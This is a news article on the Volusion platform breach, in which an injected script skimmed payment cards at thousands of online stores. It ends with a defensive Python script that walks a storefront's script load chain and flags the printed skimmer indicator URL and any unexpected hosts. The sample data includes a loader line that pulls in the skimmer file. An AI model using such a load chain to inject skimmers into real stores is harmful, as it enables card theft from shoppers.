Attackers compromised Volusion’s cloud-based e-commerce platform infrastructure and injected malicious code that steals bank card data entered by users into online forms. Currently, the malicious code has not yet been removed from the Volusion servers, and it still compromises the company’s client stores.
It is already known that 6,500 stores were affected by this attack, but in the end their number may turn out to be even higher, since last month Volusion announced that it already serves more than 20,000 customers. One of the largest victims of the incident was the Sesame Street Live store, which has currently suspended operations.
Volusion describes itself as a leading e-commerce solution for small businesses. With its powerful shopping cart software, Volusion has helped thousands of merchants, and shoppers have supposedly spent more than $28 billion in transactions and placed over 185 million orders on Volusion stores.
Volusion representatives do not respond to emails and phone calls from either journalists or researchers from Check Point, Trend Micro, or RiskIQ, who also noticed the hack.
The compromised file is located at https://storage.googleapis[.]com/volusionapi/resources.js and is loaded into Volusion online stores through /a/j/vnav.js. A copy of the infected file can be found here.
What happened to Volusion is a classic Magecart attack, during which attackers use web skimmers and steal payment card data through online stores, rather than through ATMs. Let me remind you that many Magecart groups attack not the stores themselves, but various service providers and platforms.
For example, this summer Picreel, Alpaca Forms, AppLixir, RYVIU, OmniKick, eGain and AdMaxim, which provide services to online stores, were compromised for exactly this reason.
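A store owner can check for this kind of load chain by walking every script a page pulls in, including scripts referenced from inside other scripts, and flagging known-bad URLs and hosts that are not on an allowlist. The sketch below is an added example, not code from Volusion or the researchers. The storefront `shop.example`, the `widgets.example` script and the body of `vnav.js` are constructed sample data; only the indicator URL and the `/a/j/vnav.js` path come from the article.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Indicator as printed in the article (defanged); refanged only for matching.
IOC = "https://storage.googleapis[.]com/volusionapi/resources.js".replace("[.]", ".")
# Everything below is constructed sample data, not captured traffic.
STORE = "https://shop.example/"        # hypothetical storefront
ALLOWED_HOSTS = {"shop.example"}       # hosts the owner expects scripts from
PAGE = ('<html><head><script src="/a/j/vnav.js"></script>'
        '<script src="https://widgets.example/chat.js"></script></head></html>')
FETCHED = {  # script bodies a crawler would have downloaded, keyed by URL
    "https://shop.example/a/j/vnav.js":
        'var s=document.createElement("script");'
        's.src="https://storage.googleapis.com/volusionapi/resources.js";'
        'document.head.appendChild(s);',
}
URL_RE = re.compile(r"""https?://[^\s"'<>)]+""")

class ScriptSrcs(HTMLParser):
    """Collect the absolute URL of every <script src=...> in a page."""
    def __init__(self, base):
        super().__init__()
        self.base, self.srcs = base, []
    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "script" and src:
            self.srcs.append(urljoin(self.base, src))

def audit(page_html, base, fetched, allowed_hosts, iocs):
    """Walk the script load chain; flag known-bad URLs and unexpected hosts."""
    parser = ScriptSrcs(base)
    parser.feed(page_html)
    queue, seen, findings = list(parser.srcs), set(), []
    while queue:
        url = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        if url in iocs:
            findings.append(("known-bad", url))
        elif urlsplit(url).hostname not in allowed_hosts:
            findings.append(("unexpected-host", url))
        # Scripts can pull in further scripts, so follow .js URLs in the body.
        for ref in URL_RE.findall(fetched.get(url, "")):
            if urlsplit(ref).path.endswith(".js"):
                queue.append(ref)
    return findings
```

Scanning only the page's HTML would miss the skimmer here, because the first-party `vnav.js` passes the allowlist and the external file appears only inside its body.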